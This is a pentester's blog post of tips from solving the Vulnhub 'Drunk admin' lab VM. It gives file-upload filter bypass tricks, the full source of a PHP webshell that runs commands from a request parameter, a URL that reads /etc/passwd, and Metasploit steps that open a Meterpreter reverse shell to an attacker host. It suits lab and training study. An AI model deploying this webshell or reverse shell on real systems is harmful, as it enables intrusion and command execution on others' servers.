Tricks learned from the Vulnhub Drunk admin VM

Here are some pentest tips & tricks that I got from solving the Vulnhub Drunk admin challenge. You’ll find my detailed walkthrough here.

  • File upload quick reference:
    • First, analyze the normal behavior
      • Upload different file types
      • Is the filename you supply changed by the server?
      • If yes, try uploading the file a second time. Does the server attribute a different filename this time?
      • If the new name is always the same but seems random, identify if it is a hash with hash-identifier. The new name given by the server might be the (MD5, SHA1…) encoded value of your filename (with or without its extension)
      • Where are the uploaded files located? Can you access them?
    • If only images are allowed and you want to upload and execute PHP files:
      • Upload a .php file
      • Upload a .pHp file
      • Upload a .php.png
        • Without any modification
        • Change the extension on-the-fly with Burp to .php
        • Change the MIME type on-the-fly with Burp to “x/php”
      • Upload a .php%00.png file
      • Upload a .png.php file
    • Even if your file does not seem to be successfully uploaded, try visiting the URL it is supposed to be on (with the new filename it should have)
  • Everytime you see interesting values that seem random, remember that they could be encoded (in Base64 for example)
  • When uploading PHP files, try different PHP functions (like exec, system, passthru…) because some of them might be disabled but not all of them
  • Here is a Simple PHP Webshell (using the “exec” PHP function):
    <!-- Inpired by DK's Simple PHP backdoor (http://michaeldaw.org) -->
    <?php
    if(isset($_REQUEST['cmd'])){
          echo "<pre>";
          $cmd = ($_REQUEST['cmd']);
          exec($cmd, $results);
          foreach( $results as $r )
          {
                  echo $r."<br/>";
          }
          echo "</pre>";
          die;
    }
    ?>
    Usage: http://192.168.217.6:8880/images/c53d15af2ef1513bd872612143c0adc8.php?cmd=cat+/etc/passwd
    
  • Here is how to leverage the simple PHP Webshell to get a Meterpreter session:
    msf > use multi/script/web_delivery
    msf exploit(multi/script/web_delivery) > set target 1
    target => 1
    msf exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
    payload => php/meterpreter/reverse_tcp
    msf exploit(multi/script/web_delivery) > set lhost  192.168.217.3
    lhost => 192.168.217.3
    msf exploit(multi/script/web_delivery) > set srvport 9876
    srvport => 9876
    msf exploit(multi/script/web_delivery) > set lhost  192.168.217.3
    lhost => 192.168.217.3
    msf exploit(multi/script/web_delivery) > exploit
    
    • Then execute the command displayed by Metasploit on the server via the Simple PHP Webshell
  • If you find interesting PHP files on a vulnerable server, you can download them with the Meterpreter command download -f FOLDER and serve them on a Web server local to your machine
  • Here’s how to quickly start a PHP server: cd FOLDER_YOU_WANT_TO_SERVE; php -S localhost:8000
  • Use Eyewitness for taking screenshots of all URLs (files & directories) found by Dirb
    # dirb http://192.168.217.6:8880 /usr/share/dirb/wordlists/common.txt -o dirb.log
    # cat dirb.log | grep "CODE:200" | cut -d" " -f2 > urls.txt
    # cat dirb.log | grep "==> DIRECTORY:" | cut -d" " -f3 >> urls.txt
    # eyewitness --headless -f /home/pentesterland/urls.txt 
    
  • But do not rely exclusively on Eyewitness. Always manually browse the application and keep an eye on Burp. It’ll help you to notice weird behaviors such as URLs that are only accessible when a specific cookie is used.
  • Link for finding an address associated with GPS coordinates: https://www.gps-coordinates.net/
  • Link for downloading PNG images of different sizes and categories: http://pngimg.com

If you have any questions or suggestions, please leave a comment or a message via the contact page. See you next time!


Comments